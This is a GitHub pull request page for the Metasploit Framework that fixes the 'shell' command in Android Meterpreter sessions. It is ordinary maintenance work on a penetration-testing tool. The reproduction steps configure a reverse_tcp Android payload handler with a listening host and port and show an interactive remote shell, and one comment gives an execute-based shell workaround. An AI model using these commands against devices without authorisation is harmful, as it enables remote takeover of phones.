Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix #11975, fix meterpreter shell command on android #11976

Merged
merged 1 commit into from
Jun 29, 2019
Merged

fix #11975, fix meterpreter shell command on android #11976

merged 1 commit into from
Jun 29, 2019

Conversation

timwr
Copy link
Contributor

@timwr timwr commented Jun 13, 2019

This was due to 53557cc#diff-b140b9ed40fbd717d5786d0ee125c7efL327

Steps to reproduce

  1. I am using metasploit-framework 5.0.28-dev and the reverse_tcp payload
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 7080
    exploit -j -z

  2. Asap Meterpreter session has been established I execute command "shell" and get following error
    Before fix:
    meterpreter > shell
    [-] stdapi_sys_config_getenv: Operation failed: 1

After fix:

meterpreter > shell
Process 1 created.
Channel 1 created.
echo lol
lol

Thoughts:

  1. I will also implement the getenv command on Android, but the extra call seems unnecessary given we know it will always be /system/bin/sh.
  2. I wonder if we can have a pty shell somehow
  3. Do we think it's worth removing (or moving to verbose) the Process 1 created, Channel 1 created. logs?

@timwr
Copy link
Contributor Author

timwr commented Jun 22, 2019

Merge please :trollface:

@timwr
Copy link
Contributor Author

timwr commented Jun 23, 2019

You can use meterpreter > execute -f /system/bin/sh -i -c as a workaround for now

@sempervictus
Copy link
Contributor

ping @busterb - manually requesting a merge, few of us have tested, doesn't seem to break universe, does work.

@busterb busterb self-assigned this Jun 29, 2019
@busterb
Copy link
Member

busterb commented Jun 29, 2019

Works for me, makes sense.

@busterb busterb merged commit 3338401 into rapid7:master Jun 29, 2019
busterb added a commit that referenced this pull request Jun 29, 2019
@busterb
Land #11976, use special-case path for shell command with Android met…
03d1c87 
…erpreter
@busterb
Copy link
Member

busterb commented Jun 29, 2019
edited by tdoan-r7
Loading

Release Notes

The shell command on Android Meterpreter to now explicitly uses the correct path to the shell binary.

msjenkins-r7 pushed a commit that referenced this pull request Jun 29, 2019
@busterb @msjenkins-r7
Land #11976, use special-case path for shell command with Android met…
3d5d8bb 
…erpreter
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Jul 22, 2019
@timwr timwr mentioned this pull request Aug 16, 2019
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@busterb busterb

Labels
android bug meterpreter payload rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
10 participants
@timwr @sempervictus @busterb @s-straub @sagesta @devcryptocore @LautyyColon @xhydias @tdoan-r7 @bwatters-r7